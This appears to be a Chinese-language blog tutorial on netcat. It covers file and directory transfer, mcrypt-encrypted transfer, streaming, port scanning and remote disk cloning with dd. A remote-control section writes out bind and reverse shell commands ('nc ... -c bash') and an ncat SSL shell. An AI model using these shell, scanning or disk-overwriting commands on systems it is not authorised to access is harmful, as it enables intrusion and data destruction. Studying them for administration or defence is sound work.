基本工具:nc
Nc -h(查询nv可用的参数)
Nv -v(查看连接过程中的详细信息)
Nv -n(后面指定IP地址,如果后面输入域名不会进行DNS解析)
NC用于传输文件
1.Nc -lp 333 > 文件名(随便取名字)//接收端开启侦听端口
2.nc -nv 1【接收端地址】 333 < 需要发送的文件名 -q 1 //输入接收端地址和端口,-q表示接收成功后1秒关闭进程
或者
1.Nc -q 1 -lp 333 < 需要发送的文件名
2.nc -nv【发送端地址】 333 > 文件名
Nc用于传输目录
发送端:tar -cvf - music/ | nc -lp 333 -q 1 //打包music文件夹并打开333端口侦听发送打包后的文件,-q为传输成功后一秒关闭连接
接收端:nc -nv 【发送端地址】 333 | tar -xvf - //接收打包的文件并对其解包
NC用于加密传文件
接收端:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb >文件名
// 打开并侦听一个端口,通过mcrypt命令进行解密,加密方法为ecb,加密密钥为rijindael-256,--flush为不会在本地保存,加密后重定向到【文件名】
发送端:mcrypt --flush -Fbq -a rijndael-256 -m ecb <[需要发送的文件] | Nc -nv 1.1.1.1 333 -q 1 //通过加密算法加密一个文件(此方法为对称加密),之后连接接收端的端口
NC用于流媒体服务
发送视频端:cat 【视频文件名】 | nc -lp 333 //打开一个视频文件并开启侦听一个端口
接收视频端:nc -nv 【发送端地址】 333 | mplayer -vo xll -cache 3000- //输入发送端地址和端口号,通过mplayer去播放发送端的视频,最大缓存3000字节,(接收视频端本地不会保存视频,只会实时播放发送端的视频文件)
NC用于端口扫描
Nc -nvz 1.1.1.1 1-65535 //z表示只会扫描端口是否开放,不进行连接
Nc -vnzu 1.1.1.1 1-1024 //默认只会扫描tcp端口,加u表示扫描UDP端口
NC用于远程克隆硬盘
克隆硬盘端:Nc -lp 333 | dd of=/dev/sda
被克隆硬盘端:Dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
远程克隆硬盘可以用于远程电子取证,可以将目标服务器硬盘远程复制,或者内存。
NC用于远程控制
正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash
注:windows用户把bash改为CMD
NC缺点
1.NC缺乏加密和身份验证的能力;(容易被人嗅探)
2.Ncat包含于nmap工具包中;
通过隧道加密通道实现远程控制
A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl //被控制端 allow指定允许哪个地址进行连接
B:ncat -nv 1.1.1.1 333 --ssl //控制端
不同
系统/ 平台的nc参数功能不尽相同
1319
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
